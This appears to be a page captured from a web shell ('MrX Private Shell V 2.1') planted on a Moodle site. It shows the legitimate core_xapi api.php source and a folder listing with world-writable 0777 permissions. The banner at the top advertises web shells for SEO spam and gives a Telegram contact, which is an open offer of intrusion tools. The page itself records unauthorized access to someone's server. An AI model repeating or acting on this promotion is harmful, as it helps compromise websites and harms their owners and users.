__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
namespace core_xapi;
/**
* The xAPI internal API.
*
* @package core_xapi
* @copyright 2023 Ferran Recio
* @since Moodle 4.2
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
class api {
/**
* Delete all states from a component.
*
* @param string $component The component name in frankenstyle.
* @return void
*/
public static function remove_states_from_component(string $component): void {
global $DB;
$statestore = null;
$dbman = $DB->get_manager();
try {
$handler = handler::create($component);
$statestore = $handler->get_state_store();
} catch (xapi_exception $exception) {
// If the component is not available but the xapi_states table exists, use the standard one to ensure we clean it.
$table = new \xmldb_table('xapi_states');
if ($dbman->table_exists($table)) {
$statestore = new state_store($component);
}
}
if ($statestore) {
$statestore->wipe();
}
}
/**
* Execute the states clean up for all compatible components.
*
* @return void
*/
public static function execute_state_cleanup(): void {
foreach (\core_component::get_plugin_types() as $ptype => $unused) {
$components = \core_component::get_plugin_list_with_class($ptype, 'xapi\handler');
foreach ($components as $component => $unused) {
$handler = handler::create($component);
$statestore = $handler->get_state_store();
$statestore->cleanup();
}
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| external | Folder | 0777 |
|
|
| local | Folder | 0777 |
|
|
| privacy | Folder | 0777 |
|
|
| task | Folder | 0777 |
|
|
| api.php | File | 2.33 KB | 0777 |
|
| handler.php | File | 6.99 KB | 0777 |
|
| iri.php | File | 3.1 KB | 0777 |
|
| state_store.php | File | 8.94 KB | 0777 |
|
| xapi_exception.php | File | 1.13 KB | 0777 |
|